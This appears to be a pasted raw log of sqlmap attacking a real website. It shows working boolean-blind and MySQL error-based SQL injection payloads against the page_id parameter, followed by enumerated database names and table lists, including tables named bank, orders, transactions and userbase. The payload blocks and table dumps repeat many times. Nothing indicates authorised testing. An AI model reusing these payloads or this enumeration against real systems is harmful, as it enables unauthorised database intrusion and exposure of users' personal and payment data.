
Untitled

a guest
May 17th, 2018
  1. sqlmap IDENTIFIED the following injection points WITH a total OF 28 HTTP(s) requests:
  2. ---
  3. Place: GET
  4. Parameter: page_id
  5.     TYPE: boolean-based blind
  6.     Title: AND boolean-based blind - WHERE OR HAVING clause
  7.     Payload: page_id=28167956 AND 1228=1228
  8.  
  9.     TYPE: error-based
  10.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  11.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  12. ---
  13.  
  14. available DATABASES [9]:
  15. [*] information_schema
  16. [*] mysql
  17. [*] orcataco_bumperstic
  18. [*] orcataco_officerjones
  19. [*] orcataco_officerjones_1
  20. [*] orcataco_officerjones_2
  21. [*] orcataco_snap
  22. [*] signedbump
  23. [*] test
  24.  
  25. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  26. ---
  27. Place: GET
  28. Parameter: page_id
  29.     TYPE: boolean-based blind
  30.     Title: AND boolean-based blind - WHERE OR HAVING clause
  31.     Payload: page_id=28167956 AND 1228=1228
  32.  
  33.     TYPE: error-based
  34.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  35.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  36. ---
  37.  
  38. DATABASE: mysql
  39. [17 TABLES]
  40. +---------------------------+
  41. | columns_priv              |
  42. | db                        |
  43. | func                      |
  44. | help_category             |
  45. | help_keyword              |
  46. | help_relation             |
  47. | help_topic                |
  48. | host                      |
  49. | proc                      |
  50. | procs_priv                |
  51. | tables_priv               |
  52. | time_zone                 |
  53. | time_zone_leap_second     |
  54. | time_zone_name            |
  55. | time_zone_transition      |
  56. | time_zone_transition_type |
  57. | user                      |
  58. +---------------------------+
  59.  
  60. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  61. ---
  62. Place: GET
  63. Parameter: page_id
  64.     TYPE: boolean-based blind
  65.     Title: AND boolean-based blind - WHERE OR HAVING clause
  66.     Payload: page_id=28167956 AND 1228=1228
  67.  
  68.     TYPE: error-based
  69.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  70.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  71. ---
  72.  
  73. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  74. ---
  75. Place: GET
  76. Parameter: page_id
  77.     TYPE: boolean-based blind
  78.     Title: AND boolean-based blind - WHERE OR HAVING clause
  79.     Payload: page_id=28167956 AND 1228=1228
  80.  
  81.     TYPE: error-based
  82.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  83.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  84. ---
  85.  
  86. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  87. ---
  88. Place: GET
  89. Parameter: page_id
  90.     TYPE: boolean-based blind
  91.     Title: AND boolean-based blind - WHERE OR HAVING clause
  92.     Payload: page_id=28167956 AND 1228=1228
  93.  
  94.     TYPE: error-based
  95.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  96.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  97. ---
  98.  
  99. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  100. ---
  101. Place: GET
  102. Parameter: page_id
  103.     TYPE: boolean-based blind
  104.     Title: AND boolean-based blind - WHERE OR HAVING clause
  105.     Payload: page_id=28167956 AND 1228=1228
  106.  
  107.     TYPE: error-based
  108.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  109.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  110. ---
  111.  
  112. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  113. ---
  114. Place: GET
  115. Parameter: page_id
  116.     TYPE: boolean-based blind
  117.     Title: AND boolean-based blind - WHERE OR HAVING clause
  118.     Payload: page_id=28167956 AND 1228=1228
  119.  
  120.     TYPE: error-based
  121.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  122.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  123. ---
  124.  
  125. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  126. ---
  127. Place: GET
  128. Parameter: page_id
  129.     TYPE: boolean-based blind
  130.     Title: AND boolean-based blind - WHERE OR HAVING clause
  131.     Payload: page_id=28167956 AND 1228=1228
  132.  
  133.     TYPE: error-based
  134.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  135.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  136. ---
  137.  
  138. available DATABASES [9]:
  139. [*] information_schema
  140. [*] mysql
  141. [*] orcataco_bumperstic
  142. [*] orcataco_officerjones
  143. [*] orcataco_officerjones_1
  144. [*] orcataco_officerjones_2
  145. [*] orcataco_snap
  146. [*] signedbump
  147. [*] test
  148.  
  149. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  150. ---
  151. Place: GET
  152. Parameter: page_id
  153.     TYPE: boolean-based blind
  154.     Title: AND boolean-based blind - WHERE OR HAVING clause
  155.     Payload: page_id=28167956 AND 1228=1228
  156.  
  157.     TYPE: error-based
  158.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  159.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  160. ---
  161.  
  162. DATABASE: orcataco_bumperstic
  163. [113 TABLES]
  164. +--------------------------+
  165. | _settings                |
  166. | bank                     |
  167. | basket_items             |
  168. | basket_orders            |
  169. | basket_tags              |
  170. | baskets                  |
  171. | brands                   |
  172. | bsuids                   |
  173. | categories               |
  174. | clickemail               |
  175. | clickwizard              |
  176. | comment                  |
  177. | counters                 |
  178. | counters_i12             |
  179. | counters_i24             |
  180. | counters_o12             |
  181. | counters_o24             |
  182. | emailsendlog             |
  183. | favorite_orders          |
  184. | feedback                 |
  185. | game                     |
  186. | game_score               |
  187. | hm_events                |
  188. | hm_message_queue         |
  189. | invited                  |
  190. | invited_from_force       |
  191. | item_book                |
  192. | item_tags                |
  193. | items                    |
  194. | line_items               |
  195. | logadd                   |
  196. | logcontacts              |
  197. | loggiftclick             |
  198. | logimport                |
  199. | loginvite                |
  200. | loginvited               |
  201. | logvalidate              |
  202. | logwizard                |
  203. | motd                     |
  204. | notified                 |
  205. | notify_off               |
  206. | occasions                |
  207. | orders                   |
  208. | orders_non_facebook      |
  209. | page_items               |
  210. | played                   |
  211. | post_install_items       |
  212. | post_install_items_v2    |
  213. | profile_settings         |
  214. | public_pages             |
  215. | publish_stream_sgnonpred |
  216. | purchase                 |
  217. | quicksender              |
  218. | recent_users             |
  219. | reply_from_hist          |
  220. | requests_sent            |
  221. | rpd_by_day               |
  222. | sendqueue                |
  223. | sendsthisweek            |
  224. | sendsthisweek2           |
  225. | sent                     |
  226. | settings                 |
  227. | stream_posts             |
  228. | survey_answers           |
  229. | survey_questions         |
  230. | tag_stats                |
  231. | tags                     |
  232. | temp_birthday_orders     |
  233. | temp_click_events        |
  234. | temp_daily_stats         |
  235. | temp_despicable_me       |
  236. | temp_funnel_test_orders  |
  237. | temp_hourly_stats        |
  238. | temp_invite_stats        |
  239. | temp_invite_stats_v2     |
  240. | temp_item_recs2          |
  241. | temp_nectar_ads          |
  242. | temp_nectar_stats_v2     |
  243. | temp_order_clicks        |
  244. | temp_page_counter        |
  245. | temp_page_visits         |
  246. | temp_premium_orders      |
  247. | temp_request_demo_stats  |
  248. | temp_request_stats       |
  249. | temp_retention_daily     |
  250. | temp_retention_weekly    |
  251. | temp_sendgroup_members   |
  252. | temp_sendgroup_sends     |
  253. | temp_test_order_users    |
  254. | temp_test_orders         |
  255. | temp_tutorial_stages     |
  256. | temp_user_credits        |
  257. | temp_userbase            |
  258. | theme_tag_map            |
  259. | theme_tags               |
  260. | themes                   |
  261. | themes_user_gen          |
  262. | transactions             |
  263. | uids                     |
  264. | unlocked                 |
  265. | unopened                 |
  266. | unsent                   |
  267. | unsubscribe              |
  268. | user_country             |
  269. | user_groups              |
  270. | user_items               |
  271. | user_pages               |
  272. | user_pageviews           |
  273. | user_pageviews_v2        |
  274. | user_themes              |
  275. | userbase                 |
  276. | winner                   |
  277. | wishlist                 |
  278. +--------------------------+
  279.  
  280. DATABASE: test
  281. [21 TABLES]
  282. +------------------------+
  283. | TempTable              |
  284. | appinfo                |
  285. | autoincr               |
  286. | cur                    |
  287. | deals                  |
  288. | errorcounts            |
  289. | errorfromfirst1000     |
  290. | install_metrics        |
  291. | installs_by_day        |
  292. | installs_by_invite_day |
  293. | invited_from_force     |
  294. | invites_by_day         |
  295. | invites_by_newuser_day |
  296. | ret_users2             |
  297. | retlog                 |
  298. | rpdbyda                |
  299. | send_log               |
  300. | uids                   |
  301. | user_country           |
  302. | x                      |
  303. | y                      |
  304. +------------------------+
  305.  
  306. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  307. ---
  308. Place: GET
  309. Parameter: page_id
  310.     TYPE: boolean-based blind
  311.     Title: AND boolean-based blind - WHERE OR HAVING clause
  312.     Payload: page_id=28167956 AND 1228=1228
  313.  
  314.     TYPE: error-based
  315.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  316.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  317. ---
  318.  
  319. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  320. ---
  321. Place: GET
  322. Parameter: page_id
  323.     TYPE: boolean-based blind
  324.     Title: AND boolean-based blind - WHERE OR HAVING clause
  325.     Payload: page_id=28167956 AND 1228=1228
  326.  
  327.     TYPE: error-based
  328.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  329.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  330. ---
  331.  
  332. DATABASE: test
  333. [21 TABLES]
  334. +------------------------+
  335. | TempTable              |
  336. | appinfo                |
  337. | autoincr               |
  338. | cur                    |
  339. | deals                  |
  340. | errorcounts            |
  341. | errorfromfirst1000     |
  342. | install_metrics        |
  343. | installs_by_day        |
  344. | installs_by_invite_day |
  345. | invited_from_force     |
  346. | invites_by_day         |
  347. | invites_by_newuser_day |
  348. | ret_users2             |
  349. | retlog                 |
  350. | rpdbyda                |
  351. | send_log               |
  352. | uids                   |
  353. | user_country           |
  354. | x                      |
  355. | y                      |
  356. +------------------------+
  357.  
  358. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  359. ---
  360. Place: GET
  361. Parameter: page_id
  362.     TYPE: boolean-based blind
  363.     Title: AND boolean-based blind - WHERE OR HAVING clause
  364.     Payload: page_id=28167956 AND 1228=1228
  365.  
  366.     TYPE: error-based
  367.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  368.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  369. ---
  370.  
  371. DATABASE: orcataco_bumperstic
  372. [113 TABLES]
  373. +--------------------------+
  374. | _settings                |
  375. | bank                     |
  376. | basket_items             |
  377. | basket_orders            |
  378. | basket_tags              |
  379. | baskets                  |
  380. | brands                   |
  381. | bsuids                   |
  382. | categories               |
  383. | clickemail               |
  384. | clickwizard              |
  385. | comment                  |
  386. | counters                 |
  387. | counters_i12             |
  388. | counters_i24             |
  389. | counters_o12             |
  390. | counters_o24             |
  391. | emailsendlog             |
  392. | favorite_orders          |
  393. | feedback                 |
  394. | game                     |
  395. | game_score               |
  396. | hm_events                |
  397. | hm_message_queue         |
  398. | invited                  |
  399. | invited_from_force       |
  400. | item_book                |
  401. | item_tags                |
  402. | items                    |
  403. | line_items               |
  404. | logadd                   |
  405. | logcontacts              |
  406. | loggiftclick             |
  407. | logimport                |
  408. | loginvite                |
  409. | loginvited               |
  410. | logvalidate              |
  411. | logwizard                |
  412. | motd                     |
  413. | notified                 |
  414. | notify_off               |
  415. | occasions                |
  416. | orders                   |
  417. | orders_non_facebook      |
  418. | page_items               |
  419. | played                   |
  420. | post_install_items       |
  421. | post_install_items_v2    |
  422. | profile_settings         |
  423. | public_pages             |
  424. | publish_stream_sgnonpred |
  425. | purchase                 |
  426. | quicksender              |
  427. | recent_users             |
  428. | reply_from_hist          |
  429. | requests_sent            |
  430. | rpd_by_day               |
  431. | sendqueue                |
  432. | sendsthisweek            |
  433. | sendsthisweek2           |
  434. | sent                     |
  435. | settings                 |
  436. | stream_posts             |
  437. | survey_answers           |
  438. | survey_questions         |
  439. | tag_stats                |
  440. | tags                     |
  441. | temp_birthday_orders     |
  442. | temp_click_events        |
  443. | temp_daily_stats         |
  444. | temp_despicable_me       |
  445. | temp_funnel_test_orders  |
  446. | temp_hourly_stats        |
  447. | temp_invite_stats        |
  448. | temp_invite_stats_v2     |
  449. | temp_item_recs2          |
  450. | temp_nectar_ads          |
  451. | temp_nectar_stats_v2     |
  452. | temp_order_clicks        |
  453. | temp_page_counter        |
  454. | temp_page_visits         |
  455. | temp_premium_orders      |
  456. | temp_request_demo_stats  |
  457. | temp_request_stats       |
  458. | temp_retention_daily     |
  459. | temp_retention_weekly    |
  460. | temp_sendgroup_members   |
  461. | temp_sendgroup_sends     |
  462. | temp_test_order_users    |
  463. | temp_test_orders         |
  464. | temp_tutorial_stages     |
  465. | temp_user_credits        |
  466. | temp_userbase            |
  467. | theme_tag_map            |
  468. | theme_tags               |
  469. | themes                   |
  470. | themes_user_gen          |
  471. | transactions             |
  472. | uids                     |
  473. | unlocked                 |
  474. | unopened                 |
  475. | unsent                   |
  476. | unsubscribe              |
  477. | user_country             |
  478. | user_groups              |
  479. | user_items               |
  480. | user_pages               |
  481. | user_pageviews           |
  482. | user_pageviews_v2        |
  483. | user_themes              |
  484. | userbase                 |
  485. | winner                   |
  486. | wishlist                 |
  487. +--------------------------+
  488.  
  489. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  490. ---
  491. Place: GET
  492. Parameter: page_id
  493.     TYPE: boolean-based blind
  494.     Title: AND boolean-based blind - WHERE OR HAVING clause
  495.     Payload: page_id=28167956 AND 1228=1228
  496.  
  497.     TYPE: error-based
  498.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  499.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  500. ---
  501.  
  502. DATABASE: orcataco_bumperstic
  503. [113 TABLES]
  504. +--------------------------+
  505. | _settings                |
  506. | bank                     |
  507. | basket_items             |
  508. | basket_orders            |
  509. | basket_tags              |
  510. | baskets                  |
  511. | brands                   |
  512. | bsuids                   |
  513. | categories               |
  514. | clickemail               |
  515. | clickwizard              |
  516. | comment                  |
  517. | counters                 |
  518. | counters_i12             |
  519. | counters_i24             |
  520. | counters_o12             |
  521. | counters_o24             |
  522. | emailsendlog             |
  523. | favorite_orders          |
  524. | feedback                 |
  525. | game                     |
  526. | game_score               |
  527. | hm_events                |
  528. | hm_message_queue         |
  529. | invited                  |
  530. | invited_from_force       |
  531. | item_book                |
  532. | item_tags                |
  533. | items                    |
  534. | line_items               |
  535. | logadd                   |
  536. | logcontacts              |
  537. | loggiftclick             |
  538. | logimport                |
  539. | loginvite                |
  540. | loginvited               |
  541. | logvalidate              |
  542. | logwizard                |
  543. | motd                     |
  544. | notified                 |
  545. | notify_off               |
  546. | occasions                |
  547. | orders                   |
  548. | orders_non_facebook      |
  549. | page_items               |
  550. | played                   |
  551. | post_install_items       |
  552. | post_install_items_v2    |
  553. | profile_settings         |
  554. | public_pages             |
  555. | publish_stream_sgnonpred |
  556. | purchase                 |
  557. | quicksender              |
  558. | recent_users             |
  559. | reply_from_hist          |
  560. | requests_sent            |
  561. | rpd_by_day               |
  562. | sendqueue                |
  563. | sendsthisweek            |
  564. | sendsthisweek2           |
  565. | sent                     |
  566. | settings                 |
  567. | stream_posts             |
  568. | survey_answers           |
  569. | survey_questions         |
  570. | tag_stats                |
  571. | tags                     |
  572. | temp_birthday_orders     |
  573. | temp_click_events        |
  574. | temp_daily_stats         |
  575. | temp_despicable_me       |
  576. | temp_funnel_test_orders  |
  577. | temp_hourly_stats        |
  578. | temp_invite_stats        |
  579. | temp_invite_stats_v2     |
  580. | temp_item_recs2          |
  581. | temp_nectar_ads          |
  582. | temp_nectar_stats_v2     |
  583. | temp_order_clicks        |
  584. | temp_page_counter        |
  585. | temp_page_visits         |
  586. | temp_premium_orders      |
  587. | temp_request_demo_stats  |
  588. | temp_request_stats       |
  589. | temp_retention_daily     |
  590. | temp_retention_weekly    |
  591. | temp_sendgroup_members   |
  592. | temp_sendgroup_sends     |
  593. | temp_test_order_users    |
  594. | temp_test_orders         |
  595. | temp_tutorial_stages     |
  596. | temp_user_credits        |
  597. | temp_userbase            |
  598. | theme_tag_map            |
  599. | theme_tags               |
  600. | themes                   |
  601. | themes_user_gen          |
  602. | transactions             |
  603. | uids                     |
  604. | unlocked                 |
  605. | unopened                 |
  606. | unsent                   |
  607. | unsubscribe              |
  608. | user_country             |
  609. | user_groups              |
  610. | user_items               |
  611. | user_pages               |
  612. | user_pageviews           |
  613. | user_pageviews_v2        |
  614. | user_themes              |
  615. | userbase                 |
  616. | winner                   |
  617. | wishlist                 |
  618. +--------------------------+
  619.  
  620. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  621. ---
  622. Place: GET
  623. Parameter: page_id
  624.     TYPE: boolean-based blind
  625.     Title: AND boolean-based blind - WHERE OR HAVING clause
  626.     Payload: page_id=28167956 AND 1228=1228
  627.  
  628.     TYPE: error-based
  629.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  630.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  631. ---
  632.  
  633. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  634. ---
  635. Place: GET
  636. Parameter: page_id
  637.     TYPE: boolean-based blind
  638.     Title: AND boolean-based blind - WHERE OR HAVING clause
  639.     Payload: page_id=28167956 AND 1228=1228
  640.  
  641.     TYPE: error-based
  642.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  643.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  644. ---
  645.  
  646. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  647. ---
  648. Place: GET
  649. Parameter: page_id
  650.     TYPE: boolean-based blind
  651.     Title: AND boolean-based blind - WHERE OR HAVING clause
  652.     Payload: page_id=28167956 AND 1228=1228
  653.  
  654.     TYPE: error-based
  655.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  656.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  657. ---
  658.  
  659. DATABASE: orcataco_bumperstic
  660. [113 TABLES]
  661. +--------------------------+
  662. | _settings                |
  663. | bank                     |
  664. | basket_items             |
  665. | basket_orders            |
  666. | basket_tags              |
  667. | baskets                  |
  668. | brands                   |
  669. | bsuids                   |
  670. | categories               |
  671. | clickemail               |
  672. | clickwizard              |
  673. | comment                  |
  674. | counters                 |
  675. | counters_i12             |
  676. | counters_i24             |
  677. | counters_o12             |
  678. | counters_o24             |
  679. | emailsendlog             |
  680. | favorite_orders          |
  681. | feedback                 |
  682. | game                     |
  683. | game_score               |
  684. | hm_events                |
  685. | hm_message_queue         |
  686. | invited                  |
  687. | invited_from_force       |
  688. | item_book                |
  689. | item_tags                |
  690. | items                    |
  691. | line_items               |
  692. | logadd                   |
  693. | logcontacts              |
  694. | loggiftclick             |
  695. | logimport                |
  696. | loginvite                |
  697. | loginvited               |
  698. | logvalidate              |
  699. | logwizard                |
  700. | motd                     |
  701. | notified                 |
  702. | notify_off               |
  703. | occasions                |
  704. | orders                   |
  705. | orders_non_facebook      |
  706. | page_items               |
  707. | played                   |
  708. | post_install_items       |
  709. | post_install_items_v2    |
  710. | profile_settings         |
  711. | public_pages             |
  712. | publish_stream_sgnonpred |
  713. | purchase                 |
  714. | quicksender              |
  715. | recent_users             |
  716. | reply_from_hist          |
  717. | requests_sent            |
  718. | rpd_by_day               |
  719. | sendqueue                |
  720. | sendsthisweek            |
  721. | sendsthisweek2           |
  722. | sent                     |
  723. | settings                 |
  724. | stream_posts             |
  725. | survey_answers           |
  726. | survey_questions         |
  727. | tag_stats                |
  728. | tags                     |
  729. | temp_birthday_orders     |
  730. | temp_click_events        |
  731. | temp_daily_stats         |
  732. | temp_despicable_me       |
  733. | temp_funnel_test_orders  |
  734. | temp_hourly_stats        |
  735. | temp_invite_stats        |
  736. | temp_invite_stats_v2     |
  737. | temp_item_recs2          |
  738. | temp_nectar_ads          |
  739. | temp_nectar_stats_v2     |
  740. | temp_order_clicks        |
  741. | temp_page_counter        |
  742. | temp_page_visits         |
  743. | temp_premium_orders      |
  744. | temp_request_demo_stats  |
  745. | temp_request_stats       |
  746. | temp_retention_daily     |
  747. | temp_retention_weekly    |
  748. | temp_sendgroup_members   |
  749. | temp_sendgroup_sends     |
  750. | temp_test_order_users    |
  751. | temp_test_orders         |
  752. | temp_tutorial_stages     |
  753. | temp_user_credits        |
  754. | temp_userbase            |
  755. | theme_tag_map            |
  756. | theme_tags               |
  757. | themes                   |
  758. | themes_user_gen          |
  759. | transactions             |
  760. | uids                     |
  761. | unlocked                 |
  762. | unopened                 |
  763. | unsent                   |
  764. | unsubscribe              |
  765. | user_country             |
  766. | user_groups              |
  767. | user_items               |
  768. | user_pages               |
  769. | user_pageviews           |
  770. | user_pageviews_v2        |
  771. | user_themes              |
  772. | userbase                 |
  773. | winner                   |
  774. | wishlist                 |
  775. +--------------------------+
  776.  
  777. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  778. ---
  779. Place: GET
  780. Parameter: page_id
  781.     TYPE: boolean-based blind
  782.     Title: AND boolean-based blind - WHERE OR HAVING clause
  783.     Payload: page_id=28167956 AND 1228=1228
  784.  
  785.     TYPE: error-based
  786.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  787.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  788. ---
  789.  
  790. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  791. ---
  792. Place: GET
  793. Parameter: page_id
  794.     TYPE: boolean-based blind
  795.     Title: AND boolean-based blind - WHERE OR HAVING clause
  796.     Payload: page_id=28167956 AND 1228=1228
  797.  
  798.     TYPE: error-based
  799.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  800.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  801. ---
  802.  
  803. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  804. ---
  805. Place: GET
  806. Parameter: page_id
  807.     TYPE: boolean-based blind
  808.     Title: AND boolean-based blind - WHERE OR HAVING clause
  809.     Payload: page_id=28167956 AND 1228=1228
  810.  
  811.     TYPE: error-based
  812.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  813.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  814. ---
  815.  
  816. help [1]:
  817.  
  818. wget txt [1]:
  819.  
  820. ? [1]:
  821.  
  822. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  823. ---
  824. Place: GET
  825. Parameter: page_id
  826.     TYPE: boolean-based blind
  827.     Title: AND boolean-based blind - WHERE OR HAVING clause
  828.     Payload: page_id=28167956 AND 1228=1228
  829.  
  830.     TYPE: error-based
  831.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  832.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  833. ---
  834.  
  835. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  836. ---
  837. Place: GET
  838. Parameter: page_id
  839.     TYPE: boolean-based blind
  840.     Title: AND boolean-based blind - WHERE OR HAVING clause
  841.     Payload: page_id=28167956 AND 1228=1228
  842.  
  843.     TYPE: error-based
  844.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  845.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  846. ---
  847.  
  848. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  849. ---
  850. Place: GET
  851. Parameter: page_id
  852.     TYPE: boolean-based blind
